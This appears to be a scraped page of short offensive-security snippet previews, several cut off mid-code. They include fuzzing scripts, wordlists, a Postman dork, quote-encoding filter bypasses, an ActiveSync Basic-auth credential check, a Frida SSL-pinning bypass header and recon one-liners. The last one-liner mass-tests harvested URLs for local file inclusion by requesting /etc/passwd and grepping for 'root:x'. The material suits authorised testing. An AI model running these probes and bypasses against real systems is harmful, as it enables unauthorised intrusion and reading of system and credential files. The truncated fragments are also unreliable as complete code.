incogbyte

#!/bin/bash


## Author: incogbyte
## Usage: ./ffuf_script.sh input.txt


extract_domain() {
    echo "$1" | awk -F/ '{print $3}'
}

incogbyte

text/html
text/plain
text/css
application/json
application/javascript
application/xml
application/pdf
image/jpeg
audio/mpeg
video/mp4

incogbyte

gitlab-ci.yml
gitlab-ci.yaml
gitalaci.yml
gitalaci.yml
build.xml
pom.xml
sonar.yml
sonar.yaml
dev-config.yaml
dev-hml.yaml

incogbyte

• Postman workspace

• site:postman.com inurl:/workspace "example"

incogbyte

#### unicodes - single quote
%u0027
%u02b9
%u02bc
%u02c8
%c0%27
%c0%a
%e0%80%a7

incogbyte

Burp Suite > Proxy > Options > TLS Pass Through.
Add these:
*.google\.com
.*.gstatic).com
*.mozilla\.com
.*\.googleapis\.com
*.pkil.goog

incogbyte

OPTIONS /Microsoft.Server-ActiveSync
Host: outlook.office365.com
Connection: Close
MS-ASProtocol: 14.0
Content-Length: 0
Authorization: Basic usermail:pass

incogbyte

console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);

/**
 * by incogbyte
 * Common functions 
 * thx apkunpacker, NVISOsecurity, TheDauntless
 * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
 * !!! THIS SCRIPT IS NOT A SILVER BULLET !!

incogbyte

from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile

def wordpress_plugin():
    urls = []

incogbyte

• FFUF fuzzing paths + Domains
  • assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

---

• LFI testing
  • gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

---